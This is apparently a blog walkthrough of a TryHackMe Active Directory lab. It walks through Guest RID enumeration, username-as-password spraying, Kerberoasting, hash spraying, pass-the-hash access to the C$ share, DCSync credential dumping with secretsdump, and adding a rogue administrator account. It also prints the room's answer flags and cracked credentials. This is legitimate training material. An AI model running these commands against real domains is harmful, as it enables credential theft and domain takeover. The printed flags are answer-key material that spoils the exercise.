Soupedecode01 TryHackMe Walkthrough
TL;DR walkthrough of the Soupedecode 01 TryHackMe room.
THM Walkthroughs:
A full list of our TryHackMe walkthroughs and cheatsheets is here.
Background
After a rather annoying experience taking TryHackMe’s PT1 exam, luckily for free, I wanted to do a room that has nothing to do with webapps. This room was perfect for it and included a few new tricks I will add to my AD cheatsheet such as enumerating domain accounts while only having access as the Guest user with no password.
The room also included old classics like Kerberoasting, poking around share drives looking for interesting info, password spraying, hash spraying, and PTH via smbclient, wmiexec, smbexec, evil-winrm, xfreerdp, etc. It’s always good to get reps in with those tools.
On an admin note, you may notice the IP used changing throughout the commands used in this walkthrough. This is due to restarting the target VM on TryHackMe. I didn’t use any reverse shells in this room, all IPs shown are the target VM.
Enumeration
I started with an nmap scan, as I almost always do.
Sudo nmap -sCV -O 10.201.48.23
Great, we know a couple things immediately:
- The VM is a DC
- It’s running the domain soupedecode.local
- The VM’s FQDN is DC01. soupedecode.local
- The VM is not running a webapp
The last point is important because CTFy VMs often run a website that you are supposed to poke around and find usernames. Either the robots.txt file will have a hint, you’re meant to run gobuster and find a dir that contains info, or they’ll simply have a “our valued employees” page with first and last names that you are meant to get usernames from.
This is common enough that I wrote a function to generate possible usernames. The last time I used it was in the K2 room.
#Input a text file with first name last names and generate potential usernames
#$Names = Get-Content ".\Names.txt"
Set-Location ".\CompTIA studying\THM stuff\K2"
$Names = @("James Bold", "Rose Bud")
$FQDN = "@k2.thm"
"administrator" + "$FQDN" | Out-File .\Brute.txt -Append
"guest" + "$FQDN" | Out-File .\Brute.txt -Append
ForEach($Name in $Names)
{
$FirstName = $Name.Split('')[0]
$LastName = $Name.Split('')[1]
$FirstInitial = $FirstName.Substring(0,1)
$LastInitial = $LastName.Substring(0,1)
$MangledLast = $LastName.Substring(0,2)
$MangledLast2 = $LastName.Substring(0,1)
"$FirstName.$LastName" + "$FQDN" | Out-File .\Brute.txt -Append
"$FirstName$LastName" + "$FQDN" | Out-File .\Brute.txt -Append
"$FirstName-$LastName" + "$FQDN" | Out-File .\Brute.txt -Append
"$FirstInitial$LastName" + "$FQDN" | Out-File .\Brute.txt -Append
"$FirstInitial-$LastName" + "$FQDN" | Out-File .\Brute.txt -Append
"$FirstInitial.$LastName" + "$FQDN" | Out-File .\Brute.txt -Append
"$FirstName$MangledLast" + "$FQDN" | Out-File .\Brute.txt -Append
"$FirstName$MangledLast2" + "$FQDN" | Out-File .\Brute.txt -Append
}
$Results = (Get-Content .\Brute.txt).Length
Write-Host "Mishka generated $Results usernames."
Write-Host "Copy/paste the contents of Brute.txt to /home/kali/Downloads/Wordlists/Brute and kerbrute."In this case though we are meant to give the Guest account a shot. This is an interesting take on setting up a room, I give the room’s author points for creativity on this one.
Sudo mousepad /etc/hosts
<DC's IP> soupedecode.local
/usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/guest@10.201.48.23 >> RawNames.txtI then parsed out just the usernames using PowerShell.
$Filename = ".\SoupeDecode\RawNames.txt"
$Output = "soupdecode_users.txt"
$Lines = Get-Content "$Filename"
ForEach($Line in $Lines)
{
($Line.split("\")[1]).split(" ")[0] | Out-File ".\$Output" -Append
}Initial access
I tried listening for awhile with Responder as none of the accounts were ASREPRoastable. I didn’t get any hits though. Apparently we are supposed to try password spraying. However the room’s author didn’t give us anything to try and rockyou.txt is a really big wordlist to try against every single account in an online attack. Hence I tried everyone’s username as their password.
/home/kali/Downloads/kerbrute_linux_amd64 passwordspray --domain soupedecode.local --dc 10.201.1.43 --user-as-pass /home/kali/Downloads/THM/soupedecode_users.txt
We get creds: ybob317 / ybob317
Lateral movement
Now that I have credentials I can try all sorts of things:
- Authenticated enumeration with tools like enum4linx
- Poking around share drives
- Kerberoasting
- BloodHound
enum4linux -u soupedecode.local\\ybob317 -p ybob317 -a 10.201.1.43
There’s a Users and a backup share. Let’s see if there’s any interesting information on them.
smbclient \\\\10.201.1.43\\Users -U soupedecode.local\\ybob317
cd ybob317\Desktop
more user.txt28189316c25dd3c0ad56d44d000d62a8
Nice, we found the user flag.
I next tried Kerberoasting.
/usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request soupedecode.local/ybob317 -dc-ip 10.201.1.43 -outputfile /home/kali/Downloads/THM/Roasted.txt
john /home/kali/Downloads/THM/Roasted.txt - format=krb5tgs - wordlist=/home/kali/rockyou.txt
John didn’t show which account had that password, so I ran a quick password spray against the 5 accounts with SPNs. I put these account names in TryThese.txt.
crackmapexec smb 10.201.1.43 -u /home/kali/Downloads/THM/TryThese.txt -p 'Password123!!' -d soupedecode.localWe have the password to file_svc, so let’s enumerate shares again.
smbclient \\\\10.201.1.43\\backup -U soupedecode.local\\file_svc
ls
more backup_extract.txt
I parsed out the hashes using Get-RawHashes.ps1
#Input a secretsdump file and output just the NTLM hashes
$Lines = Get-Content ".\backup_extract.txt"
ForEach($Line in $Lines)
{
$Line.Split(':')[3] | Out-File .\RawHashes.txt -Append
}
(Get-Content .\RawHashes.txt).LengthI added the computer accounts, admin, and Administrator to TryThese.txt and sprayed the hashes.
crackmapexec smb 10.201.1.43 -u /home/kali/Downloads/THM/TryThese.txt -H /home/kali/Downloads/THM/RawHashes.txt -d soupedecode.local --continue-on-success
We got a hit.
soupedecode.local\FileServer$:e41da7e79a4c76dbd9cf79d1cb325559
Privilege Escalation
So we have 2 user accounts and 1 computer account:
- ybob317 \ ybob317
- file_svc \ Password123!!
- FileServer$ \ e41da7e79a4c76dbd9cf79d1cb325559
Let’s try poking around share drives as FileServer$. Maybe this account has access to the C drive.
smbclient //10.201.1.43/C\$ -U FileServer$ - pw-nt-hash e41da7e79a4c76dbd9cf79d1cb325559 -W soupedecode.localInteresting, this account can read the C drive on the DC.
cd /Users/Administrator/Desktop
more root.txt27cb2be302c388d63d27c86bfdd5f56a
Well that was rather anti-climactic. All we did was poke around share drives, we didn’t even get a shell on the DC yet.
Post compromise
I couldn’t just put the flags into TryHackMe’s site and stop there, that was almost too easy. We also never got a shell and we didn’t dump credentials. Let’s fix that.
I tried DCSyncing as FileServer$. I figured if this account had rights to read the entire C drive then they might have rights to DCSync as well.
/usr/share/doc/python3-impacket/examples/secretsdump.py 'soupedecode.local/FileServer$@10.201.1.43' -hashes :e41da7e79a4c76dbd9cf79d1cb325559 -just-dc
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:88d40c3a9a98889f5cbb778b0db54a2f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fb9d84e61e78c26063aced3bf9398ef0:::
… snipped for brevity …
They could. I thought I might have to try copying
- C:\Windows\NTDS\ntds.dit
- C:\Windows\System32\config\SYSTEM
and dumping them offline, but no need to.
TryHackMe’s connection seems to just be really bad lately. I ended up using wmiexec to connect as the Administrator, added an account for Mishky, made her an Administrator, and then RDPed into the VM.
/usr/share/doc/python3-impacket/examples/wmiexec.py soupedecode.local/Administrator@10.201.72.72 -hashes aad3b435b51404eeaad3b435b51404ee:88d40c3a9a98889f5cbb778b0db54a2f
net user Mishky Password123 /add
net localgroup administrators Mishky /addxfreerdp /v:10.201.124.61 /u:Mishky /p:Password123 /dynamic-resolution
It turns out the VM is running on Windows Server 2022 Datacenter without the GUI installed. That was a nice touch by the room’s author. Altered Security was quite fond of doing this for the VMs in their CRTP Renewal Exam, but it’s something I don’t see on TryHackMe often.
Q&A
The room only had two questions
What is the user flag?
28189316c25dd3c0ad56d44d000d62a8
What is the root flag?
27cb2be302c388d63d27c86bfdd5f56a
Summary
TryHackMe seems to be having connection issues lately. I had to run a couple commands in this room multiple times before they worked correctly, particularly those that pulled all 1,000+ accounts in the room’s domain. A few times the VM quit responding altogether until it was restarted via TryHackMe’s site. This is a big part of why the IPs change so much throughout this walkthrough.
Overall though it was a good room and IMHO had more AD in it then the PT1 exam did. It also didn’t cram a webapp into an “AD pentest”.
I also appreciated that the room’s author put everything we were meant to find on share drives and managed to make the room work without having to let Domain Users login interactively to the DC. Nice touches like that make the exercise more realistic and less CTFy.
